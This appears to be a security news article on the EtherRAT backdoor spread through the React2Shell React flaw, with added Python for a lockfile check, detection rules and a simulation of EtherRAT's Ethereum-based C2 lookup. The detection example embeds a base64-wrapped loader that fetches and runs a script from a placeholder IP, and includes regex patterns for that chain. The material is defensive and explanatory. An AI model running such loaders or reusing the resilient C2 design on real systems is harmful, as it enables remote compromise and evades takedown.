**New EtherRAT Backdoor Surfaces in React2Shell Attacks Tied to North Korea**

The cybersecurity community has been put on high alert as researchers from Sysdig have discovered a new backdoor, dubbed EtherRAT, being used in attacks tied to North Korea. The discovery comes just two days after the disclosure of the critical React2Shell flaw (CVE-2025-55182), which is being exploited by threat actors to deploy the newly discovered remote access trojan.

North Korea-linked actors are likely using React2Shell to deliver EtherRAT, a previously unknown implant that reuses techniques from several earlier campaigns. Those campaigns have typically delivered the BeaverTail and OtterCookie infostealers and the InvisibleFerret RAT, targeting software developers on Windows, Linux, and macOS.

The tooling overlap points to the Contagious Interview campaign, active since at least November 2023 and attributed to North Korea. Its operators pose as recruiters on platforms such as LinkedIn and use social engineering, including fake job interviews and trojanized demo projects, to deliver malware to developers.

**What is React2Shell?**

React2Shell is a vulnerability in React Server Components affecting React 19.0.0, 19.1.0, 19.1.1, and 19.2.0, specifically the react-server-dom-webpack, react-server-dom-parcel, and react-server-dom-turbopack packages. The flaw is an unsafe deserialization of the request payload these packages accept for server functions: a crafted HTTP request is processed without any authentication and gives the attacker remote code execution on the server, which is why the bug carries a CVSS score of 10.0. Patched releases are 19.0.1, 19.1.2, and 19.2.1; frameworks that bundle these packages, notably Next.js, were affected as well and shipped their own fixed releases.
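As an added example (not code from the React project, Sysdig, or this article), the following Python script checks an npm lockfile for the affected packages and exact versions. The lockfile it scans is constructed for illustration and the `@acme/rsc-adapter` package is hypothetical; the point is that nested copies under another package's `node_modules` are caught and that plain `react` at 19.2.0 is not flagged, because it is not one of the affected packages.

```python
"""Check an npm lockfile for React Server Components packages affected by
React2Shell (CVE-2025-55182). Added example, not the React project's or
Sysdig's code; the lockfile below is constructed for illustration."""
import json

# Packages and exact releases named in the advisory. Fixed releases are
# 19.0.1, 19.1.2 and 19.2.1, so a naive "< 19.2.1" range check would be wrong.
AFFECTED_PACKAGES = {
    "react-server-dom-webpack",
    "react-server-dom-parcel",
    "react-server-dom-turbopack",
}
AFFECTED_VERSIONS = {"19.0.0", "19.1.0", "19.1.1", "19.2.0"}


def is_affected(name: str, version: str) -> bool:
    return name in AFFECTED_PACKAGES and version.strip() in AFFECTED_VERSIONS


def _walk_v1(deps: dict, prefix: str, hits: list[tuple[str, str]]) -> None:
    """lockfileVersion 1 nests copies under each dependency's 'dependencies'."""
    for name, meta in deps.items():
        path = f"{prefix}node_modules/{name}"
        version = meta.get("version", "")
        if is_affected(name, version):
            hits.append((path, version))
        _walk_v1(meta.get("dependencies", {}), path + "/", hits)


def find_affected(lock: dict) -> list[tuple[str, str]]:
    """Return (install path, version) for every affected copy, including
    nested duplicates that a dependency pulls in under its own node_modules."""
    hits: list[tuple[str, str]] = []
    if "packages" in lock:  # lockfileVersion 2 and 3: flat map keyed by path
        for path, meta in lock["packages"].items():
            if not path:  # "" is the root project itself
                continue
            name = path.rsplit("node_modules/", 1)[-1]  # keeps @scope/name intact
            version = meta.get("version", "")
            if is_affected(name, version):
                hits.append((path, version))
    else:  # lockfileVersion 1
        _walk_v1(lock.get("dependencies", {}), "", hits)
    return hits


def scan_lockfile(path: str) -> list[tuple[str, str]]:
    with open(path, encoding="utf-8") as fh:
        return find_affected(json.load(fh))


# Constructed lockfile: one patched nested copy, two affected copies, plus
# plain `react` at 19.2.0, which is not itself one of the affected packages.
# "@acme/rsc-adapter" is a hypothetical package used only to show nesting.
SAMPLE_LOCK = {
    "name": "demo-app",
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "demo-app"},
        "node_modules/react": {"version": "19.2.0"},
        "node_modules/react-server-dom-webpack": {"version": "19.2.0"},
        "node_modules/@acme/rsc-adapter": {"version": "1.0.0"},
        "node_modules/@acme/rsc-adapter/node_modules/react-server-dom-turbopack": {"version": "19.2.1"},
        "node_modules/react-server-dom-parcel": {"version": "19.1.1"},
    },
}

if __name__ == "__main__":
    for path, version in find_affected(SAMPLE_LOCK):
        print(f"AFFECTED {path} {version}")
```

One caveat for Next.js users: Next.js ships its own compiled copies of these packages under `next/dist/compiled` rather than as separate lockfile entries, so a lockfile scan like this one will not see them; check the `next` version against the framework's own advisory instead.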

**What is EtherRAT?**

EtherRAT is a new remote access trojan that uses Ethereum smart contracts for command-and-control (C2) resolution, installs five independent Linux persistence mechanisms, and downloads its own Node.js runtime from nodejs.org rather than relying on whatever is installed on the host. The implant is delivered in four stages. Stage one is a base64-encoded shell command executed through React2Shell; it loops until it manages to fetch a second-stage script, trying curl, wget, and python3 in turn so that a host missing any one of them still gets infected.

Once a download succeeds, stage one runs the fetched script, s.sh, which creates a hidden directory, fetches a legitimate Node.js build from nodejs.org, drops an encrypted payload and an obfuscated dropper, launches them in the background, and deletes itself to reduce the evidence left on disk. The dropper decrypts the payload with AES-256-CBC, generates a bot ID, stores it in a state file, and starts the main implant. Because the runtime is an unmodified build from nodejs.org, hash- and reputation-based checks on the node binary itself will not fire; detection has to rest on where it was installed and what it does.
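The delivery chain above is a sequence of shell behaviours rather than a fixed set of hashes, so it lends itself to behavioural rules over process-execution records. The following Python is an added example, not Sysdig's detection content or any part of the implant: it decodes the base64 wrapper to look inside the stage-one loader, flags the multi-tool download loop, the hidden-directory creation, the Node.js tarball fetch from nodejs.org, a background launch from a dot-directory, and correlates a later `rm` with a script it saw executed. The command lines, IP address, hostnames, paths and rule thresholds are all constructed for illustration.

```python
"""Behavioural checks for the EtherRAT delivery chain described above, run
over process-execution records (one command line per exec). Added example,
not Sysdig's detection content: the command lines, the 198.51.100.10 address,
hostnames and paths are constructed, and the rule names and threshold are mine."""
import base64
import re
import shlex

DOWNLOADERS = ("curl", "wget", "python3")

# `echo <b64> | base64 -d | sh`: a base64-wrapped loader handed to a shell.
B64_PIPE_SH = re.compile(
    r"echo\s+(?P<b64>[A-Za-z0-9+/=]{16,})\s*\|\s*base64\s+(?:-d|--decode)\s*\|\s*(?:ba)?sh\b"
)
# A Linux Node.js tarball pulled straight from nodejs.org.
NODE_TARBALL = re.compile(
    r"https?://nodejs\.org/dist/v[\d.]+/node-v[\d.]+-linux-\w+\.tar\.(?:gz|xz)"
)


def decode_inline_base64(cmdline: str) -> str:
    """Return the decoded loader if the command line wraps one in base64."""
    m = B64_PIPE_SH.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group("b64"), validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return ""


def has_hidden_component(path: str) -> bool:
    """True if any path component is a dot-directory (not '.' or '..')."""
    return any(p.startswith(".") and p not in (".", "..") for p in path.split("/"))


def classify(cmdline: str, seen_scripts: set[str]) -> list[str]:
    """Rules that fire for one exec record. seen_scripts carries state across
    records so that a later `rm` of a script we saw executed is caught."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:  # unbalanced quotes: fall back to whitespace split
        argv = cmdline.split()
    hits: list[str] = []
    # Rules 1-3 look at the visible command line plus the decoded loader.
    text = cmdline + "\n" + decode_inline_base64(cmdline)
    if B64_PIPE_SH.search(cmdline):
        hits.append("base64_decoded_to_shell")
    tools = {t for t in DOWNLOADERS if re.search(rf"\b{t}\b", text)}
    if len(tools) >= 2 and ("||" in text or re.search(r"\b(?:for|while)\b", text)):
        hits.append("downloader_fallback_loop")
    if NODE_TARBALL.search(text):
        hits.append("nodejs_runtime_download")
    # Rules 4-6 look at argv.
    if argv and argv[0] == "mkdir" and any(
        has_hidden_component(a) for a in argv[1:] if not a.startswith("-")
    ):
        hits.append("hidden_dir_created")
    if argv and argv[0] in ("nohup", "setsid") and any(has_hidden_component(a) for a in argv[1:]):
        hits.append("background_launch_from_hidden_dir")
    if argv and argv[0] in ("sh", "bash", "/bin/sh", "/bin/bash") and "-c" not in argv:
        args = [a for a in argv[1:] if not a.startswith("-")]
        if args:
            seen_scripts.add(args[0])  # remember `sh /tmp/s.sh`
    if argv and argv[0] == "rm" and any(a in seen_scripts for a in argv[1:]):
        hits.append("script_self_delete")
    return hits


def analyze(events: list[str]) -> list[tuple[str, list[str]]]:
    seen: set[str] = set()
    return [(e, classify(e, seen)) for e in events]


def chain_verdict(events: list[str], threshold: int = 3) -> tuple[bool, list[str]]:
    """Flag the host when enough distinct stages of the chain were observed."""
    fired = sorted({h for _, hits in analyze(events) for h in hits})
    return len(fired) >= threshold, fired


# Constructed stage-one loader in the shape the text describes: retry loop,
# curl -> wget -> python3 fallback, then run the fetched script.
STAGE1_LOADER = (
    "for i in 1 2 3; do "
    "curl -fsSL http://198.51.100.10/s.sh -o /tmp/s.sh || "
    "wget -qO /tmp/s.sh http://198.51.100.10/s.sh || "
    "python3 -c 'import urllib.request as u; u.urlretrieve(\"http://198.51.100.10/s.sh\", \"/tmp/s.sh\")'; "
    "[ -s /tmp/s.sh ] && break; sleep 5; done; sh /tmp/s.sh"
)

# Constructed exec records: six from the chain, three benign controls.
SAMPLE_EVENTS = [
    'sh -c "echo ' + base64.b64encode(STAGE1_LOADER.encode()).decode() + ' | base64 -d | sh"',
    "sh /tmp/s.sh",
    "mkdir -p /home/app/.cache-node",
    "curl -fsSL https://nodejs.org/dist/v22.11.0/node-v22.11.0-linux-x64.tar.xz -o /home/app/.cache-node/node.tar.xz",
    "nohup /home/app/.cache-node/node/bin/node /home/app/.cache-node/d.js",
    "rm -f -- /tmp/s.sh",
    "npm run build",
    "curl -fsSL https://get.docker.com -o /tmp/install.sh",
    "mkdir -p /home/app/project/dist",
]

if __name__ == "__main__":
    for cmd, hits in analyze(SAMPLE_EVENTS):
        if hits:
            print(f"{hits} <- {cmd[:70]}")
    print(chain_verdict(SAMPLE_EVENTS))
```

The per-event rules are deliberately weak on their own (a `curl` of an installer or a `mkdir` of a dot-directory is everyday activity); the value is in the correlation across the chain, which is why `chain_verdict` counts distinct stages rather than raw hits.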

**How Does EtherRAT Resolve Its C2?**

EtherRAT locates its real C2 server through an Ethereum smart contract: it queries nine RPC endpoints and accepts the value the majority of them return. The vote makes the resolution step resilient to interference: a single compromised or blocked RPC endpoint cannot redirect bots to a sinkhole, and researchers cannot poison C2 resolution by operating one rogue RPC node. The flip side for defenders is that the C2 address lives in contract state rather than in DNS, so there is no registrar to approach for a takedown; what remains controllable is the host's egress, since a web server has no reason to send Ethereum JSON-RPC requests to public endpoints.
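To make the resilience claim concrete, here is an added simulation of majority-vote resolution over nine JSON-RPC endpoints. It is not EtherRAT's code: the endpoints are in-memory fakes, the contract address and calldata are placeholders, the hostnames are constructed, and the assumption that the contract hands back an ABI-encoded `string` (and that the implant requires a strict majority rather than a plurality) is mine; the real implant's encoding and tie-breaking are whatever Sysdig documents. It shows one rogue node and one dead node failing to move the result, and what it would take (five of nine) to redirect it.

```python
"""Simulation of majority-vote C2 resolution over several Ethereum JSON-RPC
endpoints, as described above. Added example, not EtherRAT's code: endpoints
are in-memory fakes, the contract address and calldata are placeholders, and
the ABI-encoded-string return type and strict-majority rule are assumptions."""
from collections import Counter
from typing import Callable, Optional

CONTRACT = "0x" + "00" * 20  # placeholder address, not a real contract
CALLDATA = "0x" + "00" * 4   # placeholder getter selector


def abi_encode_string(s: str) -> str:
    """ABI-encode a single dynamic `string` return: offset, length, padded data."""
    data = s.encode()
    head = (32).to_bytes(32, "big") + len(data).to_bytes(32, "big")
    return "0x" + (head + data + b"\x00" * (-len(data) % 32)).hex()


def abi_decode_string(hexdata: str) -> str:
    raw = bytes.fromhex(hexdata[2:] if hexdata.startswith("0x") else hexdata)
    if len(raw) < 64:
        raise ValueError("short ABI payload")
    offset = int.from_bytes(raw[:32], "big")
    length = int.from_bytes(raw[offset:offset + 32], "big")
    if offset + 32 + length > len(raw):
        raise ValueError("truncated ABI string")
    return raw[offset + 32:offset + 32 + length].decode()


Endpoint = Callable[[dict], dict]


def make_endpoint(answer: Optional[str]) -> Endpoint:
    """A fake JSON-RPC node; `None` models a dead or timing-out endpoint."""
    def endpoint(request: dict) -> dict:
        if answer is None:
            return {"jsonrpc": "2.0", "id": request["id"],
                    "error": {"code": -32000, "message": "timeout"}}
        return {"jsonrpc": "2.0", "id": request["id"], "result": abi_encode_string(answer)}
    return endpoint


def resolve_c2(endpoints: list[Endpoint]) -> tuple[Optional[str], Counter]:
    """Ask every endpoint for the contract value and keep the answer a strict
    majority of the *valid* replies agree on; ties and all-failures give None.
    Strict majority (rather than plurality) is an assumption of this example."""
    request = {"jsonrpc": "2.0", "id": 1, "method": "eth_call",
               "params": [{"to": CONTRACT, "data": CALLDATA}, "latest"]}
    votes: Counter = Counter()
    for ep in endpoints:
        reply = ep(request)
        if "result" not in reply:
            continue  # errors and timeouts simply do not vote
        try:
            votes[abi_decode_string(reply["result"])] += 1
        except (ValueError, UnicodeDecodeError):
            continue  # malformed reply: treated like a dead node
    if not votes:
        return None, votes
    value, count = votes.most_common(1)[0]
    return (value if count * 2 > sum(votes.values()) else None), votes


# Constructed scenario: seven honest nodes, one rogue node answering with a
# sinkhole address, one dead node. Both hostnames are placeholders.
REAL_C2 = "https://c2.example.net/gate"
SINKHOLE = "https://sinkhole.example.org/"
NINE_ENDPOINTS = [make_endpoint(REAL_C2)] * 7 + [make_endpoint(SINKHOLE), make_endpoint(None)]


def poisoned_majority() -> list[Endpoint]:
    """What a redirect would take: five of the nine answering with the sinkhole."""
    return [make_endpoint(REAL_C2)] * 4 + [make_endpoint(SINKHOLE)] * 5


if __name__ == "__main__":
    print(resolve_c2(NINE_ENDPOINTS))       # real C2 wins 7 to 1
    print(resolve_c2(poisoned_majority()))  # sinkhole wins 5 to 4
```

Note what the vote does and does not buy the operator: it defeats a single rogue or sinkholed RPC node, but every one of the nine lookups is an outbound HTTPS POST carrying `"method":"eth_call"` to a public Ethereum provider, which is an unusual thing for a web server to do and is cut off wholesale by an egress allow-list.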

**What are the Indicators of Compromise (IoCs)?**

The Sysdig report includes Indicators of Compromise (IoCs) that defenders can use to detect and block the threat: network indicators, the system-call and process behavior of the implant, and other host artifacts it leaves behind.

**Conclusion**

The discovery of EtherRAT represents a significant evolution in React2Shell exploitation, moving beyond opportunistic cryptomining and credential theft toward persistent, stealthy access designed for long-term operations. The combination of blockchain-based C2, aggressive multi-vector persistence, and a payload update mechanism demonstrates a level of sophistication not previously observed in React2Shell payloads.

The overlap with DPRK "Contagious Interview" tooling raises important questions about attribution and tool-sharing between threat actors. Whether this represents North Korean actors pivoting to new exploitation vectors or sophisticated technique borrowing by another actor, the result is the same: defenders face a challenging new implant that resists traditional detection and takedown methods.

Stay tuned for further updates on this developing story, and follow me on Twitter (@securityaffairs), Facebook, and Mastodon for the latest cybersecurity news and analysis.